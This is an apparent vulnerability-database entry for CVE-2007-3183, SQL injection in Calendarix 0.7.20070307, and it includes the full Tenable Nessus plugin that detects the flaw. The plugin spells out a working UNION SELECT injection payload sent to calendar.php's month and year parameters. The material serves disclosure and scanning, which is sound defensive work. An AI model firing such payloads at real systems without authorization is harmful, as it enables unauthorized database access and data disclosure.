Vulnerabilities > CVE-2007-3183 - SQL Injection vulnerability in Vincent HOR Calendarix 0.7.20070307

047910
CVSS 6.8 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
vincent-hor
nessus
exploit available
NVD
Published: 2007-06-26
Updated: 2018-10-16

Summary

Multiple SQL injection vulnerabilities in Calendarix 0.7.20070307, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) month and (2) year parameters to calendar.php and the (3) search string to cal_search.php.

Vulnerable Configurations

Part Description Count
Application
Vincent_Hor
1

Exploit-Db

descriptionCalendarix 0.7.20070307 Multiple SQL Injection Vulnerabilities. CVE-2007-3183. Webapps exploit for php platform
idEDB-ID:30234
last seen2016-02-03
modified2007-06-25
published2007-06-25
reporterJesper Jurcenoks
sourcehttps://www.exploit-db.com/download/30234/
titleCalendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities

Nessus

NASL familyCGI abuses
NASL idCALENDARIX_MONTH_SQL_INJECTION.NASL
descriptionThe remote host is running Calendarix, a free web-based calendar application written in PHP. The version of Calendarix installed on the remote host fails to sanitize input to the
last seen2020-06-01
modified2020-06-02
plugin id25567
published2007-06-26
reporterThis script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/25567
titleCalendarix calendar.php Multiple Parameter SQL Injection
code
#
# (C) Tenable Network Security, Inc.
#



include("compat.inc");

if (description)
{
  script_id(25567);
  script_version("1.14");

  script_cve_id("CVE-2007-3183");
  script_bugtraq_id(24633);

  script_name(english:"Calendarix calendar.php Multiple Parameter SQL Injection");
  script_summary(english:"Tries to control output from calendar.php");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to SQL
injection attacks." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Calendarix, a free web-based calendar
application written in PHP. 

The version of Calendarix installed on the remote host fails to
sanitize input to the 'month' and 'year' parameters of the
'calendar.php' script before using it in database queries.  Provided
PHP's 'magic_quotes_gpc' setting is disabled, an unauthenticated
attacker can exploit these flaws to manipulate database queries, which
may lead to disclosure of sensitive information, modification of data,
or attacks against the underlying database." );
 script_set_attribute(attribute:"see_also", value:"http://www.netvigilance.com/advisory0038" );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/472221/30/0/threaded" );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/06/26");
 script_set_attribute(attribute:"vuln_publication_date", value: "2007/06/25");
 script_cvs_date("Date: 2018/11/15 20:50:16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");


port = get_http_port(default:80);

pass = unixtime();
user = SCRIPT_NAME;
sql = string("' UNION SELECT 1,1,'", pass, "','", user, "',1 #");
if (thorough_tests) 
{
  exploits = make_list(
    string("/calendar.php?month=", urlencode(str:sql)),
    string("/calendar.php?month=&year=", urlencode(str:sql))
  );
}
else 
{
  exploits = make_list(
    string("/calendar.php?month=", urlencode(str:sql))
  );
}


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/calendarix", "/calendar", cgi_dirs()));
else dirs = make_list(cgi_dirs());

info = "";
foreach dir (dirs)
{
  # Try to exploit the issue(s).
  foreach exploit (exploits)
  {
    r = http_send_recv3(method:"GET", item:string(dir, exploit), port:port);
    if (isnull(r)) exit(0);
    res = r[2];

    # There's a problem if we see our values in the output.
    if (
      "Calendarix" >< res &&
      (  string("<div class=smallcalevtime>", user, "<") >< res &&
        string(');">', pass, '</a>') >< res
      )
    ) info += '  ' + dir + exploit + '\n';
  }
  if (!thorough_tests) break;
}


if (info)
{
  report = string(
    "\n",
    "The following URI(s) demonstrate the issues :\n",
    "\n",
    info
  );
  security_warning(port:port, extra:report);
  set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
}

References